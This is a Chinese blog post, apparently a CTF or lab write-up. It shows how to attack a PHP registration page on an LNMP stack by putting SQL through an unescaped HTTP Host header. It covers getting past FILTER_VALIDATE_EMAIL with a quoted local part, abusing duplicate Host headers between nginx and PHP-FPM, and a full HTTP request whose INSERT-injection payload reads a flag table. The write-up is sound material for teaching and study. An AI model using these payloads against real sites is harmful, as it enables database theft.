攻击LNMP架构Web应用

最新推荐文章于 2024-07-18 16:53:02 发布
最新推荐文章于 2024-07-18 16:53:02 发布
阅读量1k 收藏 1
点赞数 1
文章标签: LNMP FILTER 绕过 web应用 漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jill1179457809/article/details/132327455
版权

环境配置(centos7)

1.php56 + php56-fpm

//配置epel
yum install epel-release
rpm -ivh http://rpms.famillecollet.com/enterprise/remi-release-7.rpm

//安装php56,php56-fpm及其依赖
yum --enablerepo=remi install php56-php
yum  --enablerepo=remi install php56-php-devel php56-php-fpm php56-php-gd php56-php-xml php56-php-sockets php56-php-session php56-php-snmp php56-php-mysql

2.nginx

①去往cd /usr/share/nginx/html/ 新建目录kaka,将protected文件夹和web文件夹放入kaka目录

②再去往protected目录下找到config.php设置与mysql5.7的连接

<?php

date_default_timezone_set('PRC');


$config = array(
        'rewrite' => array(
        '<m>/<c>/<a>'          => '<m>/<c>/<a>',
                '<c>/<a>'          => '<c>/<a>',
                '/'                => 'main/index',
        ),
    'debug' => 1,
    'mysql' => array(

        'MYSQL_HOST' => 'localhost',
        'MYSQL_PORT' => '3306',
        'MYSQL_USER' => 'root',
        'MYSQL_DB'   => 'LNMP',
        'MYSQL_PASS' => 'QWER97!',
        'MYSQL_CHARSET' => 'utf8mb4',

    ),
);
return $config;

③修改nginx配置文件nginx.conf,添加以下内容

server{

        listen 80;

        root /usr/local/nginx/html/kaka/web;

        index index.html index.php;

        server_name 2023.saorikaka.pw;

        location / {
                try_files $uri $uri/ /index.php;
        }


        location ~ \.php$ {
            fastcgi_pass   127.0.0.1:9000;
            fastcgi_index  index.php;
            fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
            include        fastcgi_params;
        }
}

④找到html目录下的index.html文件

在body添加内容

<form action="" method="post" enctype="multipart/form-data"></form>

⑤去 /protected/view 找main_register.html文件添加内容enctype="multipart/form-data"

 ⑥尝试登陆该网页,使用IP地址登陆,看是否跳转到 IP地址/main/log,如果357行报错,我们可以去/protected/lib目录下的core.php中将 $GLOBALS['view']['compile_dir']后的内容改为 ‘/tmp’

 成功登陆后去往regist注册页面

 

3.mysql5.7

//mysql 随便创建一个数据库并使用,添加如下代码创建存放flag的数据表
SET NAMES utf8;
SET FOREIGN_KEY_CHECKS = 0;

DROP TABLE IF EXISTS `flags`;
CREATE TABLE `flags` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `flag` varchar(256) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4;

DROP TABLE IF EXISTS `users`;
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(256) NOT NULL,
  `password` varchar(32) NOT NULL,
  `email` varchar(256) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=15 DEFAULT CHARSET=utf8mb4;

SET FOREIGN_KEY_CHECKS = 1;


//插入一个flag
insert into flags (flag) value ('I_Love_security');

题干

注册、登录功能相关代码

<?php
escape($_REQUEST);
escape($_POST);
escape($_GET);

function escape(&$arg) {
    if(is_array($arg)) {
        foreach ($arg as &$value) {
            escape($value);
        }
    } else {
        $arg = str_replace(["'", '\\', '(', ')'], ["‘", '\\\\', '(', ')'], $arg);
    }
}

function arg($name, $default = null, $trim = false) {
    if (isset($_REQUEST[$name])) {
        $arg = $_REQUEST[$name];
    } elseif (isset($_SERVER[$name])) {
        $arg = $_SERVER[$name];
    } else {
        $arg = $default;
    }
    if($trim) {
        $arg = trim($arg);
    }
    return $arg;
}

值得注意的点

1.escape是将GPR中的单引号、圆括号转换成中文符号,反斜线进行转义

2.$_REQUEST,$_POST,$_GET全都需要经过escape函数的过滤

3.arg是获取用户输入的$_REQUEST或$_SERVER。但这里$_SERVER变量没有经过转义

控制代码

<?php
function actionRegister(){
    if ($_POST) {
        $username = arg('username');
        $password = arg('password');

        if (empty($username) || empty($password)) {
            $this->error('Username or password is empty.');
        }

        $email = arg('email');
        if (empty($email)) {
            $email = $username . '@' . arg('HTTP_HOST');
        }

        if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
            $this->error('Email error.');
        }

        $user = new User();
        $data = $user->query("SELECT * FROM `{$user->table_name}` WHERE `username` = '{$username}'");
        if ($data) {
            $this->error('This username is exists.');
        }

        $ret = $user->create([
            'username' => $username,
            'password' => md5($password),
            'email' => $email
        ]);
        if ($ret) {
            $_SESSION['user_id'] = $user->lastInsertId();
        } else {
            $this->error('Unknown error.');
        }
    }

}

值得注意的点

1.账号和密码被empty函数检测,不可以为空,会报错。

2.邮箱不填写内容会自动设置为"用户名@网站域名"

3.create方法其实就是拼接了一个INSERT语句

4.因为$_SERVER没有经过转义,我们只需要在HTTP头Host值中引入单引号,即可造成一个SQL注入漏洞,但email变量经过了filter_var($email, FILTER_VALIDATE_EMAIL)的检测,我们首先要绕过FILTER_VALIDATE_EMAIL

绕过FILTER_VALIDATE_EMAIL

FILTER_VALIDATE_EMAIL的规则

RFC 3696规定,邮箱地址分为local part和domain part两部分。local part中包含特殊字符,需要如下处理:

  1. 将特殊字符用\转义,如Joe\'Blow@example.com
  2. 或将local part包裹在双引号中,如"Joe'Blow"@example.com
  3. local part长度不超过64个字符

虽然PHP没有完全按照RFC 3696进行检测,但支持上述第2种写法。所以,我们可以利用其绕过FILTER_VALIDATE_EMAIL的检测

绕过思路一

因为代码中邮箱是用户名、@、Host三者拼接而成,但用户名是经过了转义的,所以单引号只能放在Host中。我们可以传入用户名为",Host为aaa'"@example.com,

(将单引号'被包裹在双引号""中)

最后拼接出来的邮箱为"@aaa'"@example.com

简单来说

username 给一个 "

host 给一个 aaa'"@example.com

按照函数里拼接的方法 username + @ +host

结果就是"@aaa'"@example.com  这样单引号'就被带进去了

利用burpsuite进行绕过测试

1.输入  账号 "x  密码随意   email空着就行 

2.打开抓包工具 intercept is on

3.在网页上输入我们预想的账号和密码,进行sign up

4.查看抓包工具

 5.将内容全选 send to Repeater

6.去掉一些没有用的杂质

POST /main/register HTTP/1.1
Host: 192.168.226.140
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryloAJbBwR6NkeAfK6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

------WebKitFormBoundaryloAJbBwR6NkeAfK6
Content-Disposition: form-data; name="username"

"x
------WebKitFormBoundaryloAJbBwR6NkeAfK6
Content-Disposition: form-data; name="password"

123kaka
------WebKitFormBoundaryloAJbBwR6NkeAfK6--

7.真正准备绕过 

修改host为 aaaa'"@qq.com

8.send提交

 

可以看见单引号 ' 已经进入了

语法错误是因为多了一个单引号,出错才代表注入成功

查看网页内容

可见已经绕过成功 

绕过思路二——双host

更早版本,差不多 nginx1.15.10的时候  使用两个Host头

当我们传入两个Host头的时候,Nginx将以第一个为准,而PHP-FPM将以第二个为准

当我们传入如下

Host: 2023.mhz.pw

Host: xxx'"@example.com

Nginx将认为Host为2023.mhz.pw,并交给目标Server块处理;但PHP中使用$_SERVER['HTTP_HOST']取到的值却是xxx'"@example.com

绕过思路三——insert注入方法

POST /main/register HTTP/1.1
Host: 2023.mhz.pw
Host: '),('t123',md5(12123),(select(flag)from(flags)))#"@a.com
insert into users values ('"a','dsadsadasdwdasda','"a@'),('t123',md5(12123),(select(flag)from(flags)))#"@a.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=--------356678531
Content-Length: 176

----------356678531
Content-Disposition: form-data; name="username"

"a
----------356678531
Content-Disposition: form-data; name="password"

aaa
----------356678531--

闭合之前的insert语句并添加一个用户t123,将flag读取到email字段

胖虎瓶大剑
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LNMP架构详解(1)——了解架构的基本信息
zhaoliang_Guo的博客
07-26 893
前言 目前网络上主流的网络架构有两种: LAMP== Linux+Apache+Mysql+PHP LNMP== Linux+Nginx+Mysql+PHP(国外喜欢简称为LEMP,搜英文资料需要搜LEMP) LAMP和LNMP最主要的区别在于: 一个使用的是Apache,一个使用的是Nginx。 1.比较Apache与Nginx Nginx Nginx 性能稳定、功能丰富、运维简单、处理静态...
LNMP部署及HTTPS服务开启教程
09-15
总之,通过以上步骤,我们可以成功地在Linux环境下部署LNMP架构,并启用HTTPS服务,为用户提供安全、可靠的Web服务。这个过程需要对Linux系统管理、网络配置以及服务器安全有一定的理解,但对于运维人员来说,这是...
常用web服务器架构理解
追风2019
06-24 8022
一、服务器架构理解  一个Web项目上线,必须依托于服务器成为互联网之中的一个节点,要使我们的应用得以运转,这个节点内容需要进行一系列的工作环境安装配置,而为了目标项目的安全性、稳定性、灵活性,同时考虑公司运营成本,我们相应会做服务器架构对应的软件选择,也就是对服务器架构进行思考。  服务器架构的第一步则是要考虑选择什么服务器的位置和软件,包括服务器选择云端的还是自己建设、服务器操作系统、进行网络...
lnmp架构之nginx
Tuki来了
09-02 375
LNMP是指一组通常一起使用来运行动态网站或者服务器的自由软件名称首字母缩写 L指Linux,N指Nginx,M一般指MySQL,也可以指MariaDB,P一般指PHP,也可以指Perl或Python
LNMP网站服务器架构搭建
Subin_的博客
10-17 409
LNMP架构搭建 1.安装Nginx yum -y install make zlib zlib-devel gcc-c++ libtool openssl openssl-devel #安装编译工具及库文件 #安装PCRE让 Nginx支持Rewrite功能 wget https://downloads.sourceforge.net/project/pcre/pcre/8.35/pcre-8...
php mysql web开发
03-15
6. Web应用架构: - MVC(模型-视图-控制器)模式:理解其工作原理,如何组织代码以实现业务逻辑与展示分离。 - RESTful API设计:创建符合REST原则的接口,实现资源的统一表示和操作。 7. 性能优化: - 数据库...
基于Linux的Web程序设计
01-12
5. **LAMP/LNMP架构**:LAMP(Linux + Apache + MySQL + PHP)和LNMP(Linux + Nginx + MySQL + PHP)是常见的Web开发环境,了解这两种架构的搭建、调试和优化方法对于Web开发者来说非常实用。 6. **版本控制**:...
linux + apache(nginx) + mysql + php 配置 详解
10-19
这两种架构都是为了搭建动态网站和Web应用程序,支持高并发和高性能。以下是它们的配置详解: **Linux**: Linux是一种开源操作系统,作为服务器平台广泛使用。其稳定性和安全性是LAMP和LNMP的基础。对于初学者,...
捷配总结的SMT工厂安全防静电规则
tyymm的博客
07-17 494
SMT工厂须熟记的安全防静电规则! 安全对于我们非常重要,特别是我们这种SMT加工厂,通常我们所讲的安全是指人身安全。 但这里我们须树立一个较为全面的安全常识就是在强调人身安全的同时亦必须注意设备、产品的安全。 电气: 怎样预防人身触电事故? 1、发现有损坏的开关,电线等电气安全隐患,赶快向有关人员报告处理。2、不懂电气技术的人对电气设备不要乱装、乱拆。3、不要用湿手、湿脚动用电气设备(如: 按开关、按钮)。4、清扫卫生时,不要用湿抹布擦电线、开关按钮,一定要搞卫生,请先断开电
AI安全系列——[第五空间 2022]AI(持续更新)
2201_76139143的博客
07-15 1012
最近很长时间没有更新,其实一直在学习AI安全,我原以为学完深度学习之后再学AI安全会更加简单些,但是事实证明理论转实践还是挺困难的,但是请你一定要坚持下去,因为“不是所有的坚持都有结果,但总有一些坚持,能从冰封的土地里,培育出十万朵怒放的蔷薇”题目来源:NSSCTF题目描述:噪声在大数据场景下有着重要的地位。工程师们苦于被噪声污染的数据,同时也使用噪声保护着隐私数据。这个挑战分为两个部分。挑战1:从噪声中恢复隐私向量有A,B两个实体。其中B是普通实体,A则是恶意攻击者。
OWASP 移动应用 2024 十大安全风险
shendong70的博客
07-14 1239
随着智能手机的快速发展,移动应用已经成为我们日常生活关系最密切的软件应用。开放全球应用程序安全项目(OWASP)基金会,致力于提高软件的安全性。自 2014、2016年发布了移动应用的十大风险后,今年再次发布2024版。这对移动应用软件的检查工具有着重要的指导作用。
浅谈安数云智能安全运营管理平台:DCS-SOAR
2401_82472120的博客
07-15 805
安数云DCS-SOAR平台致力于解决用户云上资产的安全运营问题,面对用户防护设备繁杂臃肿、安全事件难以及时响应、运营成本逐年上升的困境,安数云DCS-SOAR平台以安全大脑驱动为核心,建立运营体系,通过OneStep框架实现第三方安全产品的“无门槛接入、低门槛纳管”;威胁和告警数量不断增长,资源又不足以应对所有问题,在日常运营中,分析人员需要快速决定哪些告警需要处理,哪些可以忽略,但由于超负荷工作,很可能错过真正的威胁,在应对威胁和恶意攻击时出现误判,最终使网络及数据产生安全泄露,造成无可挽回的损失。
飞睿智能UWB Tag蓝牙防丢器标签,宠物安全新升级,5cm精准定位测距不迷路
m0_59195407的博客
07-16 613
这意味着,无论你的宠物是在家中的某个角落捉迷藏,还是在公园的人海中穿梭,飞睿智能UWB Tag都能迅速锁定其位置,让你轻松找到它。想象一下,当晨光初破晓,你带着心爱的宠物踏上晨跑的旅程,手中轻轻握着的,不仅是牵引绳,更是对宠物安全的满满承诺。想象一下,即使在外忙碌,只需轻点手机,就能掌握宠物的一切动态,这种安心与便利,是任何传统防丢手段都无法比拟的。飞睿智能UWB Tag蓝牙防丢器,以其精准的定位、智能的功能、耐用的品质,成为了守护宠物安全的得力助手。用户见证:口碑的力量,爱的传递。
高性能、安全、低碳绿色的趋势下,锐捷网络发布三擎云办公解决方案 3.0
最新发布
CSDN云计算
07-18 604
去确保性能体验流畅。与上一代产品相比,三擎云办公 3.0 新增 130+功能特性,不仅充分对标了主流云桌面平台的核心功能,如热补丁升级与第三方存储和计算平台支持,还通过一系列创新技术,如智能透明加密技术,独享应用虚拟化技术,增强协议技术,智能 IO 调度技术等,在体验、安全、降本、增效等多个维度上展现出差异化优势。近日,锐捷网络重磅发布了三擎云办公解决方案 3.0,针对新趋势下挑战,一口气推出了 130 多项功能特性,希望为用户构建一个集安全、高效、体验于一身,实现成本优化的云桌面办公系统环境。
高效守护:在Eureka中构筑服务的分布式安全防线
2401_85341950的博客
07-15 872
通过上述步骤和代码示例,我们展示了如何在Eureka中实现服务的分布式安全策略。这包括服务认证、授权机制的实现,以及数据传输加密等关键安全措施。Eureka作为服务发现框架,在分布式安全体系中发挥着核心作用。在微服务架构中,服务的安全性不容小觑。通过本文的介绍,我们希望能够帮助读者更好地理解和实现Eureka中的分布式安全策略,确保微服务之间的通信安全,构建一个更加安全、可靠的系统。注意:本文中的代码示例为简化模型,实际应用中应根据具体需求和安全标准进行选择和实现。
数据流通环节如何规避安全风险
goodxianping的专栏
07-15 356
针对国家、行业、地方、企业等不同层级,研究制定差异化的数据流通安全能力框架和管理规范。在数据产权、流通交易、收益分配、安全治理各项具体制度研究制定过程中,明确合规监管底线,分类清理规范不适应数据要素流通发展需要的行政许可、资质资格等事项,为数据流通参与主体的探索提供稳定预期,进一步释放各主体创新活力和内生动力。由于参与数据流通与交易的数据要素资源通常是经过组织加工的高质量数据集,甚至可能涉及国家核心战略利益,一旦发生针对数据流通环节的恶意事件,将造成较大负面影响,对数据要素市场的价值激活造成潜在威胁。
【自学安全防御】二、防火墙NAT智能选路综合实验
qq_63890458的博客
07-13 946
7,办公区设备可以通过电信链路和移动链路上网(多对多的NAT,并且需要保留一个公网IP不能用来转换)8,分公司设备可以通过总公司的移动链路和电信链路访问到Dmz区的http服务器9,多出口环境基于带宽比例进行选路,但是,办公区中10.0.2.10该设备只能通过电信的链路访问互联网。链路开启过载保护,保护阈值80%;10,分公司内部的客户端可以通过域名访问到内部的服务器,公网设备也可以通过域名访问到分公司内部服务器;11,游客区仅能通过移动链路访问互联网。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值